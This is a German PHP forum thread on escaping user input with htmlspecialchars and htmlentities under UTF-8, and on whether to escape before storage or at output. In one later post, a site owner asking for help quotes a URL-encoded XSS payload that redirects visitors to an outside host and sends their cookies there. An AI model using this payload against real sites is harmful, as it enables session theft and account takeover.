htmlentities in utf-8

**Abraxax** · 29.09.2005, 22:45

Früher hab ich htmlspecialchars() verwendet.

verwende es weiter. htmlentities() ist bei utf8 i.d.t. etwas sinnfrei. ;-)

**Stargast** · 29.09.2005, 22:49

Ok, jetzt hab ich nur noch eine Frage:

Ist es besser diese Funktion beim Eintragen oder beim Auslesen der Daten zu verwenden. Zur Zeit verwende ich sie vor dem Eintragen.

**Abraxax** · 29.09.2005, 22:50

ich mache sowas immer erst bei der ausgabe. ;-)

so habe ich auch die unveränderten daten in der db.

**Stargast** · 29.09.2005, 23:28

Wie mach ich das dann bei den breaks?
Wenn ich die mit htmlspecialchars bearbeite, funktionieren sie nicht mehr so, wie sie sollten.

**onemorenerd** · 29.09.2005, 23:47

Original geschrieben von Abraxax
ich mache sowas immer erst bei der ausgabe. ;-)

so habe ich auch die unveränderten daten in der db.

Kontra! Ich mache es bei der Eingabe, weil Daten i.d.R. einmalig geschrieben werden, aber mehrmals gelesen. Lieber ohne originale Eingabe leben, aber dafür schnellere Seiten - zumindest wenn relativ sicher ist, dass man die Daten nie (wieder) in ihrer Urform braucht.
Und eineindeutige Verarbeitungen auf jeden Fall vorm Speichern. Schließlich ließen sich die Urdaten wieder gewinnen.

Höre ich ein Re?

**Abraxax** · 30.09.2005, 08:50

zumindest wenn relativ sicher ist, dass man die Daten nie (wieder) in ihrer Urform braucht.

und genau das kann ich bei einem cms nicht ausschliessen!

**ghostgambler** · 01.10.2005, 16:18

Original geschrieben von Stargast
Wenn ich die mit htmlspecialchars bearbeite, funktionieren sie nicht mehr so, wie sie sollten.

das ist eine unglaubliche Fehlerbeschreibung -.-

**AlphaWolf** · 01.10.2005, 22:23

PHP-Code:


$string = htmlspecialchars($string, ENT_QUOTES, 'UTF-8');

So sollte es funzen. Und die Kollation der Datenbank muss natürlich stimmen, falls du eine verwendest.

**indy0130** · 28.09.2006, 00:36

klappt bei mir nicht

Hi, ich hab auch so ein Problem mit den Zeichencodierungen und Html. Bei mir ist es möglich folgenden Code in dsa Skript einzugeben:

suchen.php?s=1&tag=a%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%5 3%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28104,116,116,112,58,47,47,114,119,46,100,10 1,118,97,103,101,110,116,115,46,100,101,47,110,117,114,47,106,97,99,107,46,112,104,112,63,106,97,99, 107,61)%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E&a=1&b=1">

Dadurch wird eine fremde Seite aufgerufen, die Cookies rausgeladen und schon fast ist der Böse mit dem Passwort von dem anderen online. Nach dem kurzen aufrufen der fremden Seite wird wieder zu meiner Seite weitergeleitet.

Was kann ich nun dagegen machen?

Hab folgendes probiert und es hat alles den Code so gelassen, wie er da steht:

$string = 'suchen.php?s=1&tag=a%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D% 53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28104,116,116,112,58,47,47,114,119,46,100,1 01,118,97,103,101,110,116,115,46,100,101,47,110,117,114,47,106,97,99,107,46,112,104,112,63,106,97,99 ,107,61)%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E&a=1&b=1">';

echo $string;

echo ' ';

echo htmlentities($string);

echo ' ';

echo htmlspecialchars($string, ENT_QUOTES, 'UTF-8');

echo ' ';

echo strip_tags($string);

Danke...

**ghostgambler** · 28.09.2006, 10:48

Re: klappt bei mir nicht

Was wird denn bei den echos ausgegeben? (Quellcode im Browser, nicht das was du im Browser siehst!)

**indy0130** · 28.09.2006, 11:45

Ich glaube, es war zu spät in der Nacht...er hat diesen komischen Zeichen am Ende doch ersetzt, oder? D.h. die Weiterleitung dürfte doch nicht mehr gehen?

EDIT:
Code entfernt - wir wollen hier nicht meterweit querscrollen müssen!
wahsaga

htmlentities in utf-8